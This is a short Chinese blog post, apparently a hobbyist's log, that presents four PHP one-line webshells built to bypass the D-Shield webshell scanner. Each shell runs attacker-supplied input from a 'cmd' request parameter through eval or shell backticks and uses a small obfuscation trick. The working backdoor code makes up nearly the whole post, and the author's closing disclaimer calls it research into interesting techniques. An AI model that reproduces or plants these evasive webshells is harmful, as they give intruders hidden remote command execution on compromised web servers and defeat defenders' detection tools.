简介

开一篇文章,准备持续记录一下自己发现的一些有趣的一句话,这里以绕过D盾为例吧,毕竟D盾还是比较好用的。单纯觉得php的一些特性比较有趣,而且网上免杀的一句话也是层出不穷,但是感觉思路都是如出一辙?这里记录一下自己的一些骚姿势(勉强算骚吧)。

注:截图以GET方式为例。

shell-01

Time: 2019-08-14

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
<?php

function s1ye($a)
{
	if($a==='s1ye')
	{
		return $_POST['cmd'];
	}
	return $a;

}

s1ye(eval(s1ye('s1ye')));

shell-02

Time: 2019-08-15

1
2
3
4
<?php

$a = $_POST['cmd'];
$var = "phpnb {${eval($a)}}";

shell-03

Time: 2019-08-16

这个shell注意一下,默认shellexec是被禁用的,不过phpstudy倒是没禁用(测的时候也没注意,感谢后面Y4er臭弟弟提醒)

1
2
3
4
<?php

$a = $_POST[cmd];
echo `php -r "echo \`{$a}\`;"`;

shell-04

Time: 2019-08-25

描述: 真·一句话木马

1
2
<?php
@eval("echo 'Powered by s1ye</br>';".get_defined_vars()['_GET']['cmd']);

写在后面的话

仅作有趣的姿势研究,并且不固定更新,偶尔有好的想法了会来更新,欢迎看到的师傅指点~